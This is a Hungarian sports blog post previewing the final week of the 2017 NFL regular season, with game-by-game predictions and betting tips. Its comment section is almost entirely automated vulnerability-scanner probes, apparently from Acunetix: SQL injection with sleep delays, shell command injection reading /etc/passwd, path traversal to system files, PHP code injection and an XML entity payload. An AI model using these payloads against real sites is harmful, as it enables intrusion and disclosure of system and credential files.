NFL beharangozók, 17. hét

2017. december 31., 00:04

Vendégszerkesztőnk jóvoltából ezúttal egy kötetlenebb hangvételű tippelős előzetessel jelentkezünk a szilveszteri felhozatalról.

NFL beharangozók, 17. hét

 

Elérkeztünk a szezon utolsó fordulójához, mindenki a pályán, noha néhányan már mintha most bye weeken lennének pozitív vagy épp negatív okokból. Elsőként a 19 órás sáv:

 

Minnesota Vikings – Chicago Bears
A meccsnek van tétje, a Vikings nem engedi el a pihenőhetet, ez pedig az újonc Mitch Trubisky által vezetett Bears ellen nem is tűnik túl nagy feladatnak. Kényelmesen csordogáló 60 percre számítok, a hazai védelem elit, nyerhető mérkőzés lesz ez úgy, ha labdákat szereznek és Trubisky játékában állandóan benne van is a labdavesztés. A vendégeknek nem számít az eredmény, nem is kell konzervatív playbookkal játszaniuk, próbálkozhatnak nyugodtan. A Minnesota győzelme esetén biztos a második hely, nyerni fognak, nem bíznak a többi eredményben: a Saintsnek is belefér, a Ramsnek is belefér egy vereség, a Panthers meg egy „bármi lehet az eredmény” meccset tol a Falcons-szal. Nem olvastam, hogy a Vikings pihentetni fog, Case Keenum jó formát mutat, játékban van – ha a csereirányítódnak (?) jól megy, ne zökkentsd ki. A vendégeknél nincs edzőkérdés, nincs teher a csapaton, egy vereség csak jobb áprilisi húzást eredményez. A hazai győzelem szerintem nem kérdés, bátrabbak hendikeppel is fogadhatnak, én egy minimum 5-6 pontos győzelmet várok.

 

 

Pittsburgh Steelers – Cleveland Browns
„Bátor gyerek a templomban is mer fütyülni!” – ahogy édesapám szokta mondani. Itt az első, nem papírforma meccs. Nyer a Browns! Ha mégsem, akkor az a saját bénázásuk miatt lesz… megint… Nézzük mi a helyzet: A Steelers már a PO-ban, második kiemelés, feljebb nem léphetnek, mert a Pats szinte biztosan nem kap ki. Antonio Brown sérült, Big Ben nincs üvegből, de jövőre már lehet, hogy nem látjuk, idén még a csúcsra érhet. Roethlisberger helyett a csere QB játszik, a futó Bellt az ex-Pats-es Stevan Ridley helyettesíti. Ki tenné ki veszélynek a tripla dupla B-t, egy tét nélküli meccsen? Tomlin komoly, megfontolt ember, ő is így számol, az idei szezonjukra a koronát egy Patriots-verés teheti fel, annak meg még nincs itt az ideje. A Brownsnak a sok vereségből (persze, idén mind az) volt több szoros is, nem teljesen reménytelenek, futásban például a 19. helyen vannak (2016 óta csak a Bills futóátlaga jobb!). Az 1/1-et már bezsebelték a vendégek, nem tudják elrontani (a Giants már két meccset nyert), szóval adott a lehetőség, hogy legalább a Lions csúcsát ne állítsák be egy nyeretlen szezonnal. Ha valaki mégsem hisz a meglepetésben, fogadhat egy vendéggyőzelmet 12,5-es hendikeppel – ha mégis papírforma lesz és kikap a Cleveland, nem fognak nagy verést kapni.

 

Detroit Lions – Green  Bay Packers
A mérkőzés, ami igazán már senkit sem érdekel… A Lions a múlt héten kiszállt a versenyből, a Packers is, szóval a sérülések elkerülése lehet csak a fontos, edzőkérdés szerintem egyik oldalon sincs. Hundley nem festett teljesen rosszul, az elkapói megvannak (az elkapó Davante Adams és a center Corey Linsley új szerződése is vállalható, kijár érte egy gratula), de a futójáték még nincs rendben, sokan próbálkoztak idén, köszönhetően a sok sérülésnek. A Detroit szépen fog búcsúzni, kockázat nélkül lehozzák a meccset, Stafford nem kérdés, hogy franchise player, de a futás az még mindig eredménytelen. Kicsit lehet tesztelni, kivel lehetnek eredményesebbek, úgy tűnik nem Abdullah a nyerő, de a győzelem meglesz Motorcityben, hiába nincs tétje.

 

Indianapolis Colts – Houston Texans
Egy újabb meccs tét nélkül, részvétem a szurkolóknak. A hazaiaknál Luck hiányában az egész szezon reménytelen volt, bár nem vállalhatatlan a keret. A Coltstól szerintem Pagano távozik, bár még nem jelentették be – aki a pályán lesz, jól akar teljesíteni, hogy maradhasson. Szerencséje a Coltsnak, hogy hazai pályán úgy tud elköszönni a szurkolóktól, hogy ezt a meccset behúzzák… Miért? Mert az ellenfél végképp nem fog ellenállást tanúsítani… A Houston nem bírta ki a sok sérülést, a kulcsemberek kiesését, de legalább megvan a csapat új vezére. Biztos vagyok abban, hogy jövőre sem változik az edzői gárda a Texansnál, a még egészséges játékosok sem akarnak lemaradni a következő szezon rajtjáról - jobb, ha mindenki óvatos lesz, nem akar senki IR-re kerülni, ha már két QB is ott kötött ki.… Savage is kidőlt, érte nem olyan kár, mint Watsonért. Komolyan, a szobormerev Savage semmit sem mutatott még, engem még arról sem győzött meg, hogy a kispadon helye lehetne bárhol. Yates kezd, de biztosan fog húzni QB-t is tavasszal a Texans, mert sajnos a Savage-Yates páros nem segített a csapaton. Sima hazai győzelem.

 

New York Giants – Washington Redskins
Újabb felesleges időtöltés a semleges szurkolóknak. A Giants második húzása a drafton már megvan, az öltözőben káosz, Eli rekordját is elrontották. A védelem nem lett rosszabb New Yorkban, de az elkapók sorra kidőltek és a szétesés teljes. Az új GM (Dave Gettleman) már megvan, nyilván tudja is mit akar, de ezt a találkozót nem kell megnyerniük. A Redskinsnek is rengeteg sérülése volt, a szezon nem sikerült, de a legfontosabb kérdés megint adott: mi lesz Kirk kapitánnyal? Ezt a meccset behúzzák, aztán indul az alkudozás. Cousins találna magának csapatot könnyen, van is választék rendesen, nem ronthatja el az alkupozícióját, ráadásul 8-8 lenne a szezon, ami azért nem tragédia. Nézzetek ebben a sávban mást, itt meg mehet egy sima vendéggyőzelemre tett tipp, akár 6,5 pont feletti is.

 

 

New England Patriots – New York Jets
Ez lesz a legrövidebb felkonf. Nyer a Pats, mert a lényeg náluk évek óta csak annyi – legyen meg az első kiemelés. Nyernek. A Jets QB, Bryce Petty (vagy Christian Hackeberg?) ez ellen a közepes d# ellen is kevés, ebben a New York-i öltözőben is vannak gondok, a motiváltság is véleményes, mióta McCown pihenőre kényszerült (bár a HC és a GM e héten történt szerződéshosszabbítása javíthat a helyzeten). Sima hazai győzelem, amibe a pihentetés is belefér, amint megvan a 10 pontos előny. A legbiztosabb tipp ezért egy félidős hazai vezetés, de a végeredmény tekintetében egy Jets +18,5 pont is jó, 1,6-os oddsért ajándék.

 

Philadelphia Eagles – Dallas Cowboys (tv: sport2)
Megint egy meccs, amit a fanok néznek csak, mert tét már itt sincs. A hazaiak már első kiemeltek, Wentz sérülése ellenére is Foles is inkább fóliát fog olvasni a divisional roundig, nem játszani, Sudfeld (nem is láttam még a harmadik számú irányítót játszani) elviszi a második félidőt. A Dallas már kiesett a PO harcból, de megnyerik a meccset, van mit kozmetikázniuk az idei betlin. Az Eagles pihenni fog, a Dallas meg eteti Zekét, jó kis unalmas meccs lesz. Dallasban sincs minden rendben: Dez leginkább csak hátráltató tényező – a múlt heti hiszti, majd bénázás és Prescott beszólása sem enyhíti ezt. Sima vendég, de mivel senki sem akar sérülést és ezért a védelmek is óvatos üzemmódban lesznek, egy 36,5 pont over biztos fogadásnak tűnik. Gyors meccs lesz, sok futás, futó órával – legyünk túl rajta mielőbb.

 

A 22:25-ös, már 2018-ba hajló menü:

Los Angeles Rams – San Francisco 49ers
Papírforma az alapszakaszban elértek alapján. Na ne, itt sima vendéggyőzelem születik. A Rams pihen, jól jön nekik a plusz készülési idő és a taktika csiszolása. A WC kör pihi nincs meg, nem is lehet, szóval ezen a héten már gyakorolni kell, nincs PO rutin és próbálnak minél jobban felkészülni a sorsdöntő összecsapásra. Nagyon szépen teljesítettek, de a szezonra a koronát egy győztes PO meccs tenné fel – adott hozzá minden, de vasárnap este csak a Rams special team fog tündökölni. Ez a mérlegük és a mutatottak alapján elég is lehetne egy győzelemhez, de mióta Jimmy Garoppolo betette a lábát Friscoba, egészen más szelek fújnak: főleg, hogy a hazaiaknál Sean Mannion (vajon mikor lesz majd megint kezdő?) irányit majd és több másik kulcsember pihen. Lendületben a vendégcsapat, megvan a franchise új arca, a társaság fiatal és sikerre éhes. A SF támadói miatt nézhető lesz a meccs, a fogadóirodák szerint is a SF az esélyes, ez pedig meg is történik, akár -6,5 pontos hendikeppel is, egészen nyugodtan.

 

 

Miami Dolphins – Buffalo Bills
A Miami új exnyugdíjasa nem hozott varázslatot, Gase helyett inkább Gáz lett, még a Pats skalp ellenére is. Jay Cutler megy vissza a kommentátori székbe, a Fins pedig megint bizakodhat, hogy majd jövőre. A hazai d# nem volt vak, de a támadó csapat leégett a floridai napsütésben, Ajayit is elengedték. Ugyan még ő lógott ki ebből az egységből felfelé, helyettesítése pazar, látszik nem a futó a rés a pajzson Miamiban… A Bills halvány reményei még megvannak: a Titans és a Chargers nem fog egyszerre kikapni, viszont a Flacco vezette offense nem elit és a múlt héten a Bengals is tigrisfogakat villantott. Ha a Bills nyer, talán még lehet PO, ha nem, akkor kuka a szezonjuk… szóval tippeljünk a vendégekre.

 

Baltimore Ravens – Cincinnati Bengals
Minden Ravens fan parázni fog a lefújásig. A Bengals a múlt héten kiejtette a Lionst, de előtte három sima verést kaptak. Marvinnak annyi, ez nem Már-win, máshol lesz nyugdíjas, de jön-e még hattyúdal? A Bengals futók nem egészségesek, marad a légitámadás. A Ravens defense figyelni fog, kell is, bár a Báró eddig egy meccs kivételével hibátlan, ha nem PO résztvevő csapat ellen játszanak. Sok esélyt nem adtam volna a Ravensnek, de a viszonylag könnyű sorsolás és az éledező offense szépen menetel. De mi van, ha nem jönnek a passzok? Aggodalom lesz a meccs végig, de a hazai pálya és a rájátszás közeli hangulat megmenti a Ravenst. Hazai, lépjünk is tovább, hendikepet nem merek mondani, -0,5-öt meg nem illik javasolni.

 

Los Angeles Chargers – Oakland Raiders
Ez egy must win a hazaiaknak. A Raiders tavaly nagyot ment, Carr sérülése végett vetett ennek. Idén erősödtek egy Bowmannel és a Beast Mode-dal. Eredmény? Semmi, ez is marad, jobb elfelejteni. A Chargers 0-4 után beindult, rajtuk kívül még nem jutott PO-ba ilyen kezdéssel más. Megoldják most is, ez nem kérdés. Nagyon kíváncsian várom, mit mutat majd Rivers a PO-ban, itt a lehetőség, hogy éljenek vele. Nem lesz szoros meccs, megnyugtató különbséggel nyer a hazai csapat, -5,5 hendikeppel mehet is, rá lehetne tenni egy komolyabb összeget is – ha nem a Chargersről lenne szó. A win azért sikerül.

 

Denver Broncos – Kansas City Chiefs
A Denver továbbra sem találja a megoldást a QB helyzetre, most Lynch kezd, várhatóan szintén kilátástalan játékkal. A sztárokkal teletűzdelt denveri védelem idén mélyen tudása alatt teljesít, bár én ezt inkább apátiának látom részükről – ha megszakadnak sem nyernek meccset az offense nélkül. Viszont az újonc QB, Patrick Mahomes ellen a dörzsölt védők vélhetőleg összekapják magukat, hogy kicsit elvegyék a kedvét. Mese nincs, Alex Smith már nem lesz jövőre Főnök, bár idén, korábbi éveit felrúgva távolabb is remekül látott. Smith megy, bárhová kerül, jól járnak vele, de Mahomes megmutatja, hogy lábon is és dobálva is veszélyes. Nyer a Chiefs, de nem nagy különbséggel – ha a denveri védők is ezt akarják. Sok pont nem lesz, a vendégek győzelmén kívül egy under 42,5 tipp is biztosnak tűnik.

 

 

Seattle Seahawks – Arizona Cardinals
Írhattam volna Russell Wilson-Larry Fitzgerald összecsapást is, de nem ez lenne a hivatalos kiírás. Nyerni kell a hazaiaknak, mert amúgy nincs PO. Szerencsére az ellenfél Larryt leszámítva nem veszélyes, de a védelem azért komoly tényező. Wilson egyszemélyes hadseregként nyomja, mostanra már a def sem annyira elit (sérülések, viták egymással), de meglesz a győzelem. Persze ha nyer az Atlanta, akkor ez sem ér semmit, de a PO-ra esély csak győzelemmel van. Hajrá!

 

Atlanta Falcons – Carolina Panthers (tv: sport2)
Csoportrangadó, a Carolina egyre jobb formában van, lassan Newton is a tavalyelőtti énjét mutatja, a defense pedig szinte hibátlan. Hiába játszanak idegendben, pihenni nem fognak, mert győzni akarnak, ez pedig sok lesz a Falconsnak. A bukott SB emléke megmaradt egész évre, a Sólymok nem lábaltak ki ebből – én úgy látom erre most sincs semmi esély. Ha mégis besurran a Falcons a rájátszásba, ott sem mennek tovább, az NFC-ben jelenleg ők mutatják a leggyengébb formát a rájátszás potenciális mezőnyéből. Nem az övék lesz az utolsó kiadó hely.

 

Tampa Bay Buccaneers – New Orleans Saints
Tampában a szezonban egyedül a napos, meleg idő a pozitívum. Nem sikerült előrébb lépni a tavaly mutatottakhoz képest. Az NFC Dél idén a legkeményebb csoport lett, várhatóan 3 PO résztvevővel, de akkor is gáz utolsónak lenni. A Saints sem veszi túl komolyan a meccset – Atlantában is simán elengedték a meccs végét és a hosszabbítást a sérülések elkerülése miatt – nyerni fognak, de nem minden áron. Köszönhetően annak, hogy NFC Dél házibuli lesz a wild card kör, talán lehet majd matekozni, hogy ki ellen akarnak játszani, tehát nem ezt a meccset kell megnyerni, hanem a jövőhetit. Ott is csoportrivális jön szembe. A csoportgyőzelem mégis szépen mutatna, szóval nyer a vendégcsapat, de ha úgy alakul a meccs, nem fognak megszakadni miatta. A tuti tipp: TB win +12,5 pontos hendikeppel, utóbbi meccsein is csak kevéssel kapott ki a TB.

 

Tennessee Titans – Jacksonville Jaguars (tv: sport1)
A Bills sem és a Chargers sem fog kikapni, szóval csak a győzelemmel lehet PO a Titánoknak. A csapat tavaly jobban nézett ki, de idén sem lett rosszabb – a playhívás az csak szerintem, ha hagyják Mariotát játszani jobban menne. Idén már nyertek a JAX ellen, ez most is meglehet, főleg úgy, hogy a Jaguároknak már mindegy. A NE és a PIT már elvitte a pihenőheti kiemelést, fő cél Floridában az egészség. Fournette végig sérülésekkel küzdött, de nem ő az egyedüli, akire ráfér a pihenő. Nem hiszem, hogy kezdőkkel végig lenne pályán a Jaguars, így szinte biztos a hazai győzelem. Bortlesről megoszlanak a vélemények, de nem ezen a meccsen, hanem a jövő héten kell bizonyítania. Szép eredmény a JAX idei mérlege, a PO-ban mutathatják meg, mennyire jók – a múlt héten is kikaptak már, pontháború a 49ers ellen, a liga legjobb védelme csak akkor kap 44 pontot, ha nem akarnak harapni. Nyer a Titans, de ez az idei utolsó győzelmük lesz.

 

Mindenkinek jó szurkolást és meccsnézést kívánok!

 

Kiss Gergely (Kájzerszóze)


Hozzászólások

több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
response.write(9922796*9061113)
több mint 5 éve
Törölt felhasználó
'+response.write(9922796*9061113)+'
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
"+response.write(9922796*9061113)+"
több mint 5 éve
Törölt felhasználó
&cat /etc/passwd&
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
'&cat /etc/passwd&'
több mint 5 éve
Törölt felhasználó
20 and sleep(4)
több mint 5 éve
Törölt felhasználó
SomeCustomInjectedHeader:injected_by_wvs
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
"&cat /etc/passwd&"
több mint 5 éve
Törölt felhasználó
../../../../../../../../../../etc/passwd
több mint 5 éve
Törölt felhasználó
20 or (sleep(4)+1) limit 1 --
több mint 5 éve
Törölt felhasználó
SomeCustomInjectedHeader:injected_by_wvs
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
cat /etc/passwd
több mint 5 éve
Törölt felhasználó
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
több mint 5 éve
Törölt felhasználó
20' and sleep(4)='
több mint 5 éve
Törölt felhasználó
SomeCustomInjectedHeader:injected_by_wvs
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
`cat /etc/passwd`
több mint 5 éve
Törölt felhasználó
../../../../../../../../../../etc/passwd.jpg
több mint 5 éve
Törölt felhasználó
20' and (sleep(4)+1) limit 1 --
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
|cat /etc/passwd#
több mint 5 éve
Törölt felhasználó
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n
több mint 5 éve
Törölt felhasználó
20" and sleep(4)="
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
268435455
több mint 5 éve
Törölt felhasználó
'|'ld
több mint 5 éve
Törölt felhasználó
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
több mint 5 éve
Törölt felhasználó
20' or (sleep(4)+1) limit 1 --
több mint 5 éve
Törölt felhasználó
${100327+99519}
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
több mint 5 éve
Törölt felhasználó
"|"ld
több mint 5 éve
Törölt felhasználó
/../..//../..//../..//../..//../..//etc/passwd.jpg
több mint 5 éve
Törölt felhasználó
20" or (sleep(4)+1) limit 1 --
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
;cat /etc/passwd;
több mint 5 éve
Törölt felhasználó
több mint 5 éve
Törölt felhasználó
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
több mint 5 éve
Törölt felhasználó
20'=sleep(4)='
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
1some_inexistent_file_with_long_name%00.jpg
több mint 5 éve
Törölt felhasználó
';cat /etc/passwd;'
több mint 5 éve
Törölt felhasználó
/etc/passwd
több mint 5 éve
Törölt felhasználó
20"=sleep(4)="
több mint 5 éve
Törölt felhasználó
 testasp.vulnweb.com/t/fit.txt?%00.jpg
több mint 5 éve
Törölt felhasználó
20&n933308=v940953
több mint 5 éve
Törölt felhasználó
";cat /etc/passwd;"
több mint 5 éve
Törölt felhasználó
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
több mint 5 éve
Törölt felhasználó
'"\'\");|]*{
<>
több mint 5 éve
Törölt felhasználó
20;select pg_sleep(4); --
több mint 5 éve
Törölt felhasználó
testasp.vulnweb.com
több mint 5 éve
Törölt felhasználó
||cat /etc/passwd
több mint 5 éve
Törölt felhasználó
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
több mint 5 éve
Törölt felhasználó
20';select pg_sleep(4); --
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
&dir
több mint 5 éve
Törölt felhasználó
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
)
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20; waitfor delay '0:0:4' --
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
'&dir&'
több mint 5 éve
Törölt felhasználó
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
!(()&&!|*|*|
több mint 5 éve
Törölt felhasználó
20'; waitfor delay '0:0:4' --
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
"&dir&"
több mint 5 éve
Törölt felhasználó
file:///etc/passwd
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
^(#$!@#$)(()))******
több mint 5 éve
Törölt felhasználó
20"; waitfor delay '0:0:4' --
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
|dir
több mint 5 éve
Törölt felhasználó
/\../\../\../\../\../\../\../etc/passwd
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
'|dir
több mint 5 éve
Törölt felhasználó
;print(md5(acunetix_wvs_security_test));
több mint 5 éve
Törölt felhasználó
 testasp.vulnweb.com/t/xss.html?%00.jpg
több mint 5 éve
Törölt felhasználó
WEB-INF/web.xml
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
'"()
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
';print(md5(acunetix_wvs_security_test));$a='
több mint 5 éve
Törölt felhasználó
"|dir
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
WEB-INF\web.xml
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
";print(md5(acunetix_wvs_security_test));$a="
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
../../../../../../../../../../windows/win.ini
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
 testasp.vulnweb.com/t/fit.txt
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
${@print(md5(acunetix_wvs_security_test))}
több mint 5 éve
Törölt felhasználó
acunetix_wvs_invalid_filename
több mint 5 éve
Törölt felhasználó
../../../../../../../../../../boot.ini
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
${@print(md5(acunetix_wvs_security_test))}\
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
comment
több mint 5 éve
Törölt felhasználó
../../../../../../../../../../windows/win.ini.jpg
több mint 5 éve
Törölt felhasználó
1'"
több mint 5 éve
Törölt felhasználó
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
comment
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
//www.acunetix.tst
több mint 5 éve
Törölt felhasználó
több mint 5 éve
Törölt felhasználó
\
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
comment/.
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
................windowswin.ini
több mint 5 éve
Törölt felhasználó


]>
&acunetixent;
több mint 5 éve
Törölt felhasználó
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
..\..\..\..\..\..\..\..\windows\win.ini
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
'"
több mint 5 éve
Törölt felhasználó
@@4WMl6
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
több mint 5 éve
Törölt felhasználó
20'"()&%
több mint 5 éve
Törölt felhasználó